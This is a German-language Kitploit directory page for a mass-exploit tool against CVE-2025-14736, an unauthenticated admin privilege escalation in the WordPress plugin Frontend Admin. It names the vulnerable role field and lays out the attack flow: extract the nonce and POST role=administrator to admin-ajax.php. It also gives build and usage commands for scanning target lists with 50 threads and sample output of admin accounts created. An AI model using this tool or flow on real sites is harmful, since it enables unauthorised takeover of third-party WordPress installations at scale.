Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-14736 — Nicht authentifizierte Privilegieneskalation zum Administrator über das Rollenformularfeld | Kitploit
Tools/GitHubGitHub/hyunchiya/cve-2025-14736
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

Nicht authentifizierte Privilegieneskalation zum Administrator über das Rollenformularfeld

Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-14736

Frontend Admin von DynamiApps - Nicht authentifizierte Rechteausweitung

Autor: Hyun Chiya


Informationen zur Schwachstelle

FeldWert
CVE-IDCVE-2025-14736
PluginFrontend Admin by DynamiApps
Betroffene Versionen<= 3.28.25
SchwachstellentypNicht authentifizierte Rechteausweitung
SchweregradKritisch

Beschreibung

Das Frontend Admin Plugin für WordPress ist aufgrund unzureichender Validierung benutzergesteuerter Felder während der Registrierung anfällig für nicht authentifizierte Rechteausweitung. Angreifer können beliebige Rollen injizieren, darunter administrator, indem sie die Formularübermittlungsdaten manipulieren.

Ursachenanalyse

Die anfällige Logik liegt in der Verarbeitung von Formularübermittlungen, bei der das role-Feld aus der Benutzereingabe übernommen wird, ohne zu überprüfen, ob der Benutzer berechtigt ist, diese Rolle zuzuweisen. Insbesondere kann das Feld acff[user][field_user_role_ID] auf administrator geändert werden.

Exploitation Flow

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

Voraussetzungen

  1. Das Ziel hat das Plugin "Frontend Admin" installiert (anfällige Version).
  2. Ein Frontend-Registrierungsformular ist aktiviert und zugänglich.

Build

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

Verwendung

Massenscan & Exploit

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

Optionen

ArgumentBeschreibung
-lPfad zur Liste der Ziel-URLs (Standard: list.txt)
-tAnzahl gleichzeitiger Threads (Standard: 10)
-timeoutAnfrage-Timeout in Sekunden (Standard: 15)

Beispielausgabe

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Massen-Exploit-Tool                                                ║
    ║   Frontend Admin von DynamiApps Rechteausweitung                                     ║
    ║   Autor: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] 500 Ziele geladen. Scan mit 50 Threads wird gestartet...

[ERFOLG] http://target.com | Benutzer: hacker_mass | Passwort: Password123! | FormID: 48
[ERFOLG] http://example.org | Benutzer: hacker_mass | Passwort: Password123! | FormID: 32

[*] Scan abgeschlossen.

Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie es verantwortungsbewusst.

Autor

Hyun Chiya

Tool herunterladen